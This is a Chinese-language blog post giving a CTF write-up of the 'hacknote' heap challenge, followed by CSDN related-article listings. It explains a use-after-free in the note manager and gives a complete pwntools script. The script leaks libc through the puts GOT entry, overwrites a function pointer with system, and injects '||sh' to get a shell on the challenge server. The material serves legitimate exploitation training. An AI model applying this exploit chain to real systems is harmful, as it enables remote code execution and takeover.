攻防世界 —— hacknote

已于 2022-08-28 11:18:34 修改
阅读量1.4k 收藏 14
点赞数 5
分类专栏: CTF训练 Linux PWN 文章标签: 安全 linux web安全
于 2022-07-19 20:43:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/125878437
版权
CTF训练 同时被 3 个专栏收录
46 篇文章 14 订阅
订阅专栏
Linux
37 篇文章 0 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏

目录

题目分析

在这里插入图片描述

主函数

在这里插入图片描述
在这里插入图片描述
主函数比较简单就是输入1-4,执行相应的功能

Add note功能:

在这里插入图片描述
存在一个notelist表,notelist可放5个元素,每次执行Add时看是否存在空闲空间,存在则申请一个8byte的空间,前4byte字节存放putself函数地址,后4byte再申请一块子空间,大小为size,内容为用户输入,具体如下:
在这里插入图片描述
这里有两点:1. 存在一个函数put_self,并且函数参数为1的,后四个字节指向另一块空间,大小和内容均可以由用户输入

delete_note功能:

在这里插入图片描述
delete_note比较简单,就是free Add函数申请的空间,但存在UAF漏洞

print_note功能:

在这里插入图片描述
非常简单,就是调用notelist表中所指向地址的函数,参数为自身,如图,正常情况就是put_self函数,参数为自身地址(此处为0xfffffff)
在这里插入图片描述

漏洞分析

漏洞主要存在于add_note和delete_note中,假设一个这样的场景:

  1. 先add_note(),并申请一块size=16的空间,内容随意
  2. 再add_note(),并申请一块size=16的空间,内容随意
  3. delete_note(1),delete_note(2),整体结构如图:
    在这里插入图片描述
  4. 再add_note(),并申请一块size=8的空间,内容随意,这时则会发送变化了。首先add_note需要8byte,会使用第二次add_note()被释放的8byte空间,也就是2号,由于第二次申请的还是8byte,则第一次add_note()被释放8byte也就是1号被使用,图示为:
    在这里插入图片描述
    这时候就有意思了,由于删除时只释放内存每释放指针,所以note_list中的1和2仍还指向原地址空间,而3处指向的地址空间为1和2的8字节处的地址,并且由于二级指针处可以写入数据,所以3可以向1指向的8byte字节写入数据

我们的思想就是通过notelist[3]可以直接控制notelist[1]处空间,将notelist[1]的put_self换成system,sub_chunk换成||sh

这个||sh是shell注入,因为按照原来的show的逻辑,是这样的

system(notelist[i])
现在为system( XXXX||sh),先执行system(XXXX),若不行则执行system(sh)

攻击代码

from pwn import *

url, port = "61.147.171.105", 51068
filename = "./hacknote"
elf = ELF(filename)
# context(arch="amd32", os="linux")
context(arch="i386", os="linux")

debug = 0
if debug:
    context.log_level="debug"
    io = process(filename)
    context.terminal = ['tmux', 'splitw', '-h']
    libc = elf.libc
    # gdb.attach(io)
else:
    libc = ELF("./libc_32.so.6")
    io = remote(url, port)

def BK():
    gdb.attach(io) #  "b *" + str(hex(addr))

def Add(size,content):
    io.sendlineafter(b'Your choice :',b'1')
    io.sendlineafter(b'Note size :',str(size))
    io.sendlineafter(b'Content :',content)

def Print(index):
    io.sendlineafter(b'Your choice :',b'3')
    io.sendlineafter(b'Index :',str(index))

def Del(index):
    io.sendlineafter(b'Your choice :',b'2')
    io.sendlineafter(b'Index :',str(index))

def pwn():
    Add(0x20, "zzzz")
    Add(0x20, "zzzz")
    Del(0)
    Del(1)

    puts_func_addr = 0x804862B
    puts_got = elf.got['puts']
    payload = p32(puts_func_addr) + p32(puts_got)
    Add(0x8, payload)
    Print(0)
    libc_base = u32(io.recv(4)) - libc.sym['puts']

    Del(2)
    system_addr = libc_base + libc.sym["system"]
    payload = p32(system_addr) + b"||sh"
    Add(0x8, payload)
    Print(0)
    io.interactive()

if __name__ == '__main__':
    pwn()
Mokapeng
关注
  • 5
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-PWN进阶区-hacknote(pwnable.tw)
weixin_44145820的博客
03-04 585
攻防世界中这道题是pwnable.tw上面的原题,虽然在攻防世界上难度为7星,不过实际上这题不算难,只需要利用UAF就可以完成。 题目分析 题目链接:https://pan.baidu.com/s/1T-mIVLkxvyZ_7VvlBuInZQ 提取码:azyd checksec: 保护机制比前几题弱了很多 main: hacknote实现了三个功能: 1.添加(上限为5) 在新建no...
hacknote 记录
weixin_55190422的博客
11-27 340
做了这么久的Pwn终于遇到堆的题目了。 而此处就有一个漏洞——UAF漏洞,即释放之后并没有清空指针,则仍然可以调用其他的相关函数。 也就是,实际上调用了控制chunk可用部分的前4个字节的函数指针所指向的函数,参数为控制chunk可用部分地址。 那么,如果我们可以修改控制chunk中可用部分的前4个字节所指向的位置,修改为system,并在后四个字节中添加上 ||sh (这里一开始没想到,注意为了执行shell命令,可以的一些方法 sh# 或者 ||sh ,前一个可以注释掉后面的...
攻防世界)(pwn)hacknote
PLpa的博客
07-31 3386
use after free 堆!堆!堆! 终于对堆的结构有了一定的了解,开始做堆的题目,恰巧攻防世界xctf中有这么一题可以练练手,还是挺不错的。。。 对于use after free呢,这里有ctf-wiki的学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free-zh/ 写的非常详细,很实用...
攻防世界】CTF 网络安全学习 easyupload_攻防世界easyupload(1)
最新发布
2401_84247760的博客
05-08 733
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
BUUCTF-PWN-pwnable_hacknote-UAF
Rt1Text的博客
07-10 1040
标准的菜单模式canary和NX保护 2.sub_80487D4() 3.sub_80488A5() 利用思路 泄露libc,调用system,执行bin/sh/,获取shellprint note可以打印泄露地址传入该函数的参数是note结构体自身,无法直接传入字符串“\bin\sh”,原来的note_puts(arg0)是对puts(arg0+4)的封装,而现在的system(arg0)中arg0并不指向字符串而指向system的地址,所以这里需要system参数截断,system
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952541
hacknote.zip
12-30
本题目是攻防世界一道6分的堆漏洞题目,在ctf wiki上面有比较详细的解析和漏洞利用,几乎一模一样,但区别是这道题没有后门函数,所以漏洞利用的方式发生了变化,推荐大家动手分析。
攻防世界-难度1-Misc总结
Welcome To Myon'Blog !
03-05 4944
攻防世界-难度1-Misc总结 ; 主要针对Misc入门、图片隐写; kali linux、Stegsolve.jar、010Editor、WinHex、QR Research、Ziperello、ARCHPR、RX-SSTV、IDLE、Bandizip、7zFM、Firefox、SilentEye、DeepSound、PS、Wireshark;binwalk、foremost、zsteg、strings、grep、stegpy、file、checksec、pngcheck、convert、montage
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1332
学习pwn开始,慢慢来不要急
攻防世界-unseping
m0_49025459的博客
12-17 2809
通过分析上面的代码我们可以得出,我们只要控制ctf这个参数的输入的值,就可以达成命令执行的效果,但是上面的代码,我们需要两个参数ping和后面命令执行的值,我们首先就得看看当前目录下都有些什么东西。我们看见 flag_1s_here目录下有一个flag_831b69012c67b35f.php,我们猜想运行这个php或者将它拿出来就可以获得flag,我们访问了该路径发现是空白的无法执行,那我们就用cat命令将这个php读取出来,我们可以使用三中命令读取。打开就是PHP源码,我们对源码进行分析。
堆重启_uaf_hacknote
蚁景网安学院
10-14 354
亲爱的,关注我吧10/14文章共计2219个词预计阅读8分钟来和我一起阅读吧参考链接http://blog.eonew.cn/archives/490 https://blog.csd...
pwn学习——UseAfterFree hacknote
MrTreebook的博客
11-28 249
pwn学习——UseAfterFree hacknote1. 反编译看一下源代码2.add_note3.print_note4.del_note5.exp6.运行结果 1. 反编译看一下源代码 可以看到大概有四个功能 add del print menu 另外还有后门函数magic 2.add_note 可以看到在添加note的时候,每一个note有两个部分 第一个部份是一个put函数 第二个部分存放的是real_content 一个note节点内部结构是这样的 3.print_note 调用pu
【愚公系列】2023年06月 攻防世界-Web(blgdel)
时光隧道
06-20 6975
PHP文件上传漏洞是指攻击者能够通过上传恶意文件来执行恶意代码,从而控制服务器或窃取敏感数据的安全漏洞。一般来说,攻击者会将一些包含恶意代码的文件伪装成图片、压缩包等常见格式的文件,骗取用户上传,进而向网站提交指定的文件名,替换掉原有的文件,造成恶意代码的执行,危害网站安全。攻击者可以通过以下方式来利用PHP文件上传漏洞:上传Webshell:攻击者可以上传包含恶意代码的Webshell,通过Webshell控制服务器,获取敏感信息,或者利用Webshell进行后续攻击。
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3644
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
攻防世界repeater
08-31
- *1* *3* [攻防世界——xff_referer](https://blog.csdn.net/weixin_73668856/article/details/128004633)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值